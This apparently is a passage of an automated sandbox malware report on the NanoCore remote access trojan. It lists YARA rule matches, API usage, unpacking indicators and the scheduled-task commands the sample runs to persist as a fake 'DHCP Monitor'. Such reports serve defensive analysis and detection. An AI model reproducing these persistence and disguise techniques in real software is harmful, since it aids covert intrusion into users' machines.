      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: classification engineClassification label: mal100.troj.evad.winEXE@18/20@24/2
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_004041E5
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,1_2_004020A6
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_00401489
      Source: C:\Users\user\Desktop\nanocore.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_01
      Source: C:\Users\user\Desktop\nanocore.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bee718f3-e47a-44f8-955e-2fe2c6c0351c}
      Source: C:\Users\user\Desktop\nanocore.exeFile created: C:\Users\user\AppData\Local\Temp\nss2662.tmpJump to behavior
      Source: nanocore.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\nanocore.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: nanocore.exeVirustotal: Detection: 21%
      Source: nanocore.exeReversingLabs: Detection: 34%
      Source: C:\Users\user\Desktop\nanocore.exeFile read: C:\Users\user\Desktop\nanocore.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe'
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe'
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe' Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: wntdll.pdbUGP source: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp, nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp, dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp, nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp, dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\nanocore.exeUnpacked PE file: 2.2.nanocore.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Source: C:\Users\user\Desktop\nanocore.exeUnpacked PE file: 10.2.nanocore.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 11.2.dhcpmon.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 13.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Detected unpacking (creates a PE file in dynamic memory)Show sources
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 11.2.dhcpmon.exe.4920000.9.unpack
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\nanocore.exeUnpacked PE file: 2.2.nanocore.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\nanocore.exeUnpacked PE file: 10.2.nanocore.exe.400000.0.unpack
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 11.2.dhcpmon.exe.400000.0.unpack
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 13.2.dhcpmon.exe.400000.1.unpack
      .NET source code contains potential unpackerShow sources
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,1_2_00401FDC
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_00401F16 push ecx; ret 2_2_00401F29
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_051C7648 push eax; iretd 2_2_051C7649
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_00401F16 push ecx; ret 10_2_00401F29
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_050D7648 push eax; iretd 10_2_050D7649
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_05266E5D push FFFFFF8Bh; iretd 10_2_05266E5F
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_1_00401F16 push ecx; ret 10_1_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_00401F16 push ecx; ret 11_2_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_05087648 push eax; iretd 11_2_05087649
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_2_05256E5D push FFFFFF8Bh; iretd 11_2_05256E5F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 11_1_00401F16 push ecx; ret 11_1_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_00401F16 push ecx; ret 13_2_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_051C7648 push eax; iretd 13_2_051C7649
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_2_05396E5D push FFFFFF8Bh; iretd 13_2_05396E5F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 13_1_00401F16 push ecx; ret 13_1_00401F29
